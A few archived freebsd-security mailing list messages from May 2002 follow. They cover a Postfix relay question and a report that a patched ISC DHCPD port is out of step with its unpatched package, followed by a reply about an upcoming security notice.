ESMTP (SMTPD32-6.06) id AC886ACE01E0; Sun, 12 May 2002 00:34:48 +0200 Message-Id: <5.1.0.14.2.20020511173155.028dc008@mail.Go2France.com> X-Sender: LConrad@Go2France.com@mail.Go2France.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Sat, 11 May 2002 17:34:06 -0500 To: freebsd-security@freebsd.org From: Len Conrad Subject: Re: POSTFIX RELAY SERVER ON FREEBSD In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Could some one help me out on POSTFIX RELAY SERVER ON FREEBSD. >I am almost through but some small hickups. > >Could someone having an experience help me out. several 100 people have setup IMGate in my sig. Just ask if you want the config files. Len www.menandmice.com/DNS-training : DNS Training BIND8NT.MEIway.com : ISC BIND for NT4 & W2K IMGate.MEIway.com : Build free, hi-perf, anti-abuse mail gateways To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 11 16: 2: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from forum.lariat.org (forum.lariat.org [12.23.109.3]) by hub.freebsd.org (Postfix) with ESMTP id 38EA537B405 for ; Sat, 11 May 2002 16:02:02 -0700 (PDT) Received: (from brett@localhost) by forum.lariat.org (8.9.3/8.9.3) id RAA15457 for security@freebsd.org; Sat, 11 May 2002 17:02:00 -0600 (MDT) Date: Sat, 11 May 2002 17:02:00 -0600 (MDT) From: Brett Glass Message-Id: <200205112302.RAA15457@forum.lariat.org> To: security@freebsd.org Subject: DHCPD bug Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org There's a nasty bug in ISC's DHCPD -- a remote root hole -- that affects the versions that have been provided as ports and packages in recent releases. See http://www.extremetech.com/article/0,3396,apn=2&s=1024&a=26709&ap=1,00.asp for a description of the problem. The version of the port that's online has been updated to close the hole, but the package hasn't -- which means that users installing FreeBSD who grab the daemon via /stand/sysinstall will find themselves vulnerable. Also, no advisory has been issued.... One should be. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 11 18:38:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 0012C37B406 for ; Sat, 11 May 2002 18:38:11 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 634723C; Sat, 11 May 2002 20:38:11 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.11.6) with ESMTP id g4C1cBr7061480; Sat, 11 May 2002 20:38:11 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g4C1cAnd061479; Sat, 11 May 2002 20:38:10 -0500 (CDT) Date: Sat, 11 May 2002 20:38:10 -0500 From: "Jacques A. Vidrine" To: Brett Glass Cc: security@freebsd.org Subject: Re: DHCPD bug Message-ID: <20020512013810.GA61469@madman.nectar.cc> References: <200205112302.RAA15457@forum.lariat.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200205112302.RAA15457@forum.lariat.org> User-Agent: Mutt/1.3.28i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, May 11, 2002 at 05:02:00PM -0600, Brett Glass wrote: > Also, no advisory has been issued.... > One should be. No advisory will be issued, but it will be included in the next `Security Notice' (coming Real Soon Now). Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message